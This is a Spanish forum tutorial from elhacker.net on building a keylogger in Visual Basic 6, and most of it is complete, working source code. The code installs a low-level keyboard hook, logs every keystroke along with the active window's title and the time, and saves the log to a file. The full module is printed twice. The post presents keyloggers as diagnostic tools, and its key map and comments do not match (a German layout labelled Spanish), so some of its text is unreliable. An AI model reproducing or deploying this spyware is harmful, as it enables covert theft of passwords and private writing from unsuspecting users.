Foro de elhacker.net

• Introducción:
  
• Que es un Keylogger?
• Clases de Keyloggers.
• Para que sirven?
• Al grano:
  
• APIs.
• Declaraciones, Constantes y Tipos.
• Funciones.
• Código de ejemplo.
• Despedida y consejos.

Un keylogger (Key=Tecla Logger=Registrador) es una herramienta de diagnóstico utilizada en el 
desarrollo de software que se encarga de registrar las pulsaciones que se realizan sobre el teclado, para 
memorizarlas en un fichero y/o enviarlas a través de Internet.

• Ring 0: Los que se ejecutan desde el núcleo del sistema, lo que los hace bastante mas difíciles de eliminar.
• Hook: Se ejecutan en Modo Usuario y utilizan un 'Enganche' al sistema, para que cuando se presione una tecla el sistema te advierte. Este es el método que trataremos en la parte practica.
• Otros metodos: Estos son otros metodos, normalmente peores. Por ejemplo, un keylogger que cada cierto intervalo de tiempo compruebe tecla por tecla cual esta presionada.

• CopyMemory: Para volcar la información del hook a una variable.
• SetWindowsHookExA: Para establecer el hook al teclado.
• CallNextHookEx: Para continuar con nuestro hook.
• UnhookWindowsHookEx: Para deshacer el hook al teclado.
• GetAsyncKeyState: Para saber si la tecla Shift esta presionada.
• GetForegroundWindow: Para obtener la ventana que tiene el foco.
• GetWindowTextA: Para obtener el texto de una ventana.

Public Sub ManageKeylogger(ByVal Enable As Boolean)
    Select Case Enable
        Case True
            KBHook = SetWindowsHookEx(WH_KEYBOARD_LL, AddressOf KBProc, App.hInstance,0)
        Case False
            Call UnhookWindowsHookEx(KBHook)
    End Select
End Sub

Public Function KBProc(ByVal nCode As Long, ByVal wParam As Long, lParam As Long) As Long
    Dim KeyBoardHook        As KBDLLHOOKSTRUCT
 
    If nCode = 0 Then
        CopyMemory KeyBoardHook, lParam, Len(KeyBoardHook)
        With KeyBoardHook
            If .Flags = 0 Or .Flags = 1 Then
                If SaveLog(TranslateKey(.VkCode)) > 50 Then
                    Call LogToFile(App.Path & "\Log.log")
                End If
            End If
        End With
    Else
        KBProc = CallNextHookEx(KBHook, nCode, wParam, lParam)
    End If
End Function

Private Function TranslateKey(ByVal KeyCode As Long) As String
    Dim LngShift            As Long
 
    'Funcion optimizada para su uso en teclados españoles.
 
    LngShift = GetAsyncKeyState(vbKeyShift)
    If KeyCode >= 58 And KeyCode <= 90 Then
        TranslateKey = IIf(LngShift <> 0, UCase(Chr(KeyCode)), LCase(Chr(KeyCode)))
    ElseIf KeyCode >= 96 And KeyCode <= 105 Then
        TranslateKey = Chr(KeyCode - 48)
    ElseIf KeyCode >= 112 And KeyCode <= 123 Then
        TranslateKey = "{F" & KeyCode - 111 & "}"
    Else
        If KeyCode = 160 Then TranslateKey = ""
        If KeyCode = 161 Then TranslateKey = "{SHIFT DER.}"
        If KeyCode = 38 Then TranslateKey = "{FLECHA ARRIBA}"
        If KeyCode = 40 Then TranslateKey = "{FLECHA ABAJO}"
        If KeyCode = 37 Then TranslateKey = "{FLECHA IZQ.}"
        If KeyCode = 39 Then TranslateKey = "{FLECHA DER.}"
        If KeyCode = 32 Then TranslateKey = "{ESPACIO}"
        If KeyCode = 27 Then TranslateKey = "{ESC}"
        If KeyCode = 46 Then TranslateKey = "{DEL}"
        If KeyCode = 36 Then TranslateKey = "{HOME}"
        If KeyCode = 35 Then TranslateKey = "{END}"
        If KeyCode = 33 Then TranslateKey = "{PAGE UP}"
        If KeyCode = 34 Then TranslateKey = "{PAGE DOWN}"
        If KeyCode = 45 Then TranslateKey = "{PASTE}"
        If KeyCode = 144 Then TranslateKey = "{NUM}"
        If KeyCode = 111 Then TranslateKey = "{NUMPAD / }"
        If KeyCode = 106 Then TranslateKey = "{NUMPAD * }"
        If KeyCode = 109 Then TranslateKey = "{NUMPAD - }"
        If KeyCode = 107 Then TranslateKey = "{NUMPAD + }"
        If KeyCode = 13 Then TranslateKey = "{ENTER}"
        If KeyCode = 8 Then TranslateKey = "{BACK}"
        If KeyCode = 221 Then TranslateKey = "{ACCENTO}"
        If KeyCode = 9 Then TranslateKey = "{TAB}"
        If KeyCode = 20 Then TranslateKey = "{BLOQ. MAYUS}"
        If KeyCode = 162 Then TranslateKey = "{STRG LEFT}"
        If KeyCode = 163 Then TranslateKey = "{STRG DER.}"
        If KeyCode = 91 Then TranslateKey = "{WINDOWS}"
        If KeyCode = 164 Then TranslateKey = "{ALT}"
        If KeyCode = 165 Then TranslateKey = "{ALTGR}"
        If KeyCode = 93 Then TranslateKey = "{MENU CONTEXTUAL}"
        If KeyCode = 188 Then TranslateKey = IIf(LngShift <> 0, ";", ",")
        If KeyCode = 190 Then TranslateKey = IIf(LngShift <> 0, ":", ".")
        If KeyCode = 189 Then TranslateKey = IIf(LngShift <> 0, "_", "-")
        If KeyCode = 191 Then TranslateKey = IIf(LngShift <> 0, "'", "#")
        If KeyCode = 187 Then TranslateKey = IIf(LngShift <> 0, "*", "+")
        If KeyCode = 186 Then TranslateKey = IIf(LngShift <> 0, "Ü", "ü")
        If KeyCode = 192 Then TranslateKey = IIf(LngShift <> 0, "Ö", "ö")
        If KeyCode = 222 Then TranslateKey = IIf(LngShift <> 0, "Ä", "ä")
        If KeyCode = 219 Then TranslateKey = IIf(LngShift <> 0, "?", "ß")
        If KeyCode = 220 Then TranslateKey = IIf(LngShift <> 0, "°", "^")
        If KeyCode = 48 Then TranslateKey = IIf(LngShift <> 0, "=", "0")
        If KeyCode = 49 Then TranslateKey = IIf(LngShift <> 0, "!", "1")
        If KeyCode = 50 Then TranslateKey = IIf(LngShift <> 0, """", "2")
        If KeyCode = 51 Then TranslateKey = IIf(LngShift <> 0, "§", "3")
        If KeyCode = 52 Then TranslateKey = IIf(LngShift <> 0, "$", "4")
        If KeyCode = 53 Then TranslateKey = IIf(LngShift <> 0, "%", "5")
        If KeyCode = 54 Then TranslateKey = IIf(LngShift <> 0, "&", "6")
        If KeyCode = 55 Then TranslateKey = IIf(LngShift <> 0, "/", "7")
        If KeyCode = 56 Then TranslateKey = IIf(LngShift <> 0, "(", "8")
        If KeyCode = 57 Then TranslateKey = IIf(LngShift <> 0, ")", "9")
        If KeyCode = 145 Then TranslateKey = "{ROLL}"
        If KeyCode = 44 Then TranslateKey = "{PRINT}"
        If KeyCode = 19 Then TranslateKey = "{PAUSE}"
        If TranslateKey = "" And KeyCode <> 160 Then TranslateKey = KeyCode
    End If
End Function

Public Function SaveLog(ByVal sKey As String) As Double
    Dim aHwnd               As Long
    Dim WinText             As String
    aHwnd = GetForegroundWindow
 
    If aHwnd <> lHwnd Then
        lHwnd = aHwnd
        WinText = String$(255, Chr$(0))
        Call GetWindowText(aHwnd, WinText, Len(WinText))
        WinText = Left$(WinText, InStr(WinText, Chr$(0)) - 1)
 
        KeyData = KeyData & vbCrLf & "{" & WinText & "} - [" & Now$ & "]" & vbCrLf
    End If
 
    KeyData = KeyData & sKey
 
    SaveLog = Len(KeyData)
End Function

Public Sub LogToFile(ByVal sPath As String)
    Open sPath For Binary As #1
        Put #1, , KeyData
    Close #1
End Sub

Option Explicit
 
'|||||||||||||||||||||||
'|                     |
'|Autor: Karcrack      |
'|Fecha: 24/09/08      |
'|                     |
'|||||||||||||||||||||||
 
 
Private Declare Function SetWindowsHookEx Lib "user32.dll" Alias "SetWindowsHookExA" (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
Private Declare Function UnhookWindowsHookEx Lib "user32.dll" (ByVal hHook As Long) As Long
Private Declare Function CallNextHookEx Lib "user32.dll" (ByVal hHook As Long, ByVal nCode As Long, ByVal wParam As Long, ByRef lParam As Any) As Long
Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (ByRef Destination As Any, ByRef Source As Any, ByVal Length As Long)
Private Declare Function GetAsyncKeyState Lib "user32.dll" (ByVal vKey As Long) As Integer
Private Const WH_KEYBOARD_LL   As Long = 13
 
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Long
Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
 
Public Type KBDLLHOOKSTRUCT
    VkCode                  As Long
    ScanCode                As Long
    Flags                   As Long
    Time                    As Long
    DwExtraInfo             As Long
End Type
 
Dim KBHook                  As Long
Dim KeyData                 As String
Dim lHwnd                   As Long
 
Public Sub ManageKeylogger(ByVal Enable As Boolean)
    Select Case Enable
        Case True
            KBHook = SetWindowsHookEx(WH_KEYBOARD_LL, AddressOf KBProc, App.hInstance, 0)
        Case False
            Call UnhookWindowsHookEx(KBHook)
    End Select
End Sub
 
Public Function KBProc(ByVal nCode As Long, ByVal wParam As Long, lParam As Long) As Long
    Dim KeyBoardHook        As KBDLLHOOKSTRUCT
 
    If nCode = 0 Then
        CopyMemory KeyBoardHook, lParam, Len(KeyBoardHook)
        With KeyBoardHook
            If .Flags = 0 Or .Flags = 1 Then
                If SaveLog(TranslateKey(.VkCode)) > 50 Then
                    Call LogToFile(App.Path & "\Log.log")
                End If
            End If
        End With
    Else
        KBProc = CallNextHookEx(KBHook, nCode, wParam, lParam)
    End If
End Function
 
Private Function TranslateKey(ByVal KeyCode As Long) As String
    Dim LngShift            As Long
 
    'Funcion optimizada para su uso en teclados españoles.
 
    LngShift = GetAsyncKeyState(vbKeyShift)
    If KeyCode >= 58 And KeyCode <= 90 Then
        TranslateKey = IIf(LngShift <> 0, UCase(Chr(KeyCode)), LCase(Chr(KeyCode)))
    ElseIf KeyCode >= 96 And KeyCode <= 105 Then
        TranslateKey = Chr(KeyCode - 48)
    ElseIf KeyCode >= 112 And KeyCode <= 123 Then
        TranslateKey = "{F" & KeyCode - 111 & "}"
    Else
        If KeyCode = 160 Then TranslateKey = ""
        If KeyCode = 161 Then TranslateKey = "{SHIFT DER.}"
        If KeyCode = 38 Then TranslateKey = "{FLECHA ARRIBA}"
        If KeyCode = 40 Then TranslateKey = "{FLECHA ABAJO}"
        If KeyCode = 37 Then TranslateKey = "{FLECHA IZQ.}"
        If KeyCode = 39 Then TranslateKey = "{FLECHA DER.}"
        If KeyCode = 32 Then TranslateKey = "{ESPACIO}"
        If KeyCode = 27 Then TranslateKey = "{ESC}"
        If KeyCode = 46 Then TranslateKey = "{DEL}"
        If KeyCode = 36 Then TranslateKey = "{HOME}"
        If KeyCode = 35 Then TranslateKey = "{END}"
        If KeyCode = 33 Then TranslateKey = "{PAGE UP}"
        If KeyCode = 34 Then TranslateKey = "{PAGE DOWN}"
        If KeyCode = 45 Then TranslateKey = "{PASTE}"
        If KeyCode = 144 Then TranslateKey = "{NUM}"
        If KeyCode = 111 Then TranslateKey = "{NUMPAD / }"
        If KeyCode = 106 Then TranslateKey = "{NUMPAD * }"
        If KeyCode = 109 Then TranslateKey = "{NUMPAD - }"
        If KeyCode = 107 Then TranslateKey = "{NUMPAD + }"
        If KeyCode = 13 Then TranslateKey = "{ENTER}"
        If KeyCode = 8 Then TranslateKey = "{BACK}"
        If KeyCode = 221 Then TranslateKey = "{ACCENTO}"
        If KeyCode = 9 Then TranslateKey = "{TAB}"
        If KeyCode = 20 Then TranslateKey = "{BLOQ. MAYUS}"
        If KeyCode = 162 Then TranslateKey = "{STRG LEFT}"
        If KeyCode = 163 Then TranslateKey = "{STRG DER.}"
        If KeyCode = 91 Then TranslateKey = "{WINDOWS}"
        If KeyCode = 164 Then TranslateKey = "{ALT}"
        If KeyCode = 165 Then TranslateKey = "{ALTGR}"
        If KeyCode = 93 Then TranslateKey = "{MENU CONTEXTUAL}"
        If KeyCode = 188 Then TranslateKey = IIf(LngShift <> 0, ";", ",")
        If KeyCode = 190 Then TranslateKey = IIf(LngShift <> 0, ":", ".")
        If KeyCode = 189 Then TranslateKey = IIf(LngShift <> 0, "_", "-")
        If KeyCode = 191 Then TranslateKey = IIf(LngShift <> 0, "'", "#")
        If KeyCode = 187 Then TranslateKey = IIf(LngShift <> 0, "*", "+")
        If KeyCode = 186 Then TranslateKey = IIf(LngShift <> 0, "Ü", "ü")
        If KeyCode = 192 Then TranslateKey = IIf(LngShift <> 0, "Ö", "ö")
        If KeyCode = 222 Then TranslateKey = IIf(LngShift <> 0, "Ä", "ä")
        If KeyCode = 219 Then TranslateKey = IIf(LngShift <> 0, "?", "ß")
        If KeyCode = 220 Then TranslateKey = IIf(LngShift <> 0, "°", "^")
        If KeyCode = 48 Then TranslateKey = IIf(LngShift <> 0, "=", "0")
        If KeyCode = 49 Then TranslateKey = IIf(LngShift <> 0, "!", "1")
        If KeyCode = 50 Then TranslateKey = IIf(LngShift <> 0, """", "2")
        If KeyCode = 51 Then TranslateKey = IIf(LngShift <> 0, "§", "3")
        If KeyCode = 52 Then TranslateKey = IIf(LngShift <> 0, "$", "4")
        If KeyCode = 53 Then TranslateKey = IIf(LngShift <> 0, "%", "5")
        If KeyCode = 54 Then TranslateKey = IIf(LngShift <> 0, "&", "6")
        If KeyCode = 55 Then TranslateKey = IIf(LngShift <> 0, "/", "7")
        If KeyCode = 56 Then TranslateKey = IIf(LngShift <> 0, "(", "8")
        If KeyCode = 57 Then TranslateKey = IIf(LngShift <> 0, ")", "9")
        If KeyCode = 145 Then TranslateKey = "{ROLL}"
        If KeyCode = 44 Then TranslateKey = "{PRINT}"
        If KeyCode = 19 Then TranslateKey = "{PAUSE}"
        If TranslateKey = "" And KeyCode <> 160 Then TranslateKey = KeyCode
    End If
End Function
 
Public Function SaveLog(ByVal sKey As String) As Double
    Dim aHwnd               As Long
    Dim WinText             As String
    aHwnd = GetForegroundWindow
 
    If aHwnd <> lHwnd Then
        lHwnd = aHwnd
        WinText = String$(255, Chr$(0))
        Call GetWindowText(aHwnd, WinText, Len(WinText))
        WinText = Left$(WinText, InStr(WinText, Chr$(0)) - 1)
 
        KeyData = KeyData & vbCrLf & "{" & WinText & "} - [" & Now() & "]" & vbCrLf
    End If
 
    KeyData = KeyData & sKey
 
    SaveLog = Len(KeyData)
End Function
 
Public Sub LogToFile(ByVal sPath As String)
    Open sPath For Binary As #1
        Put #1, , KeyData
    Close #1
End Sub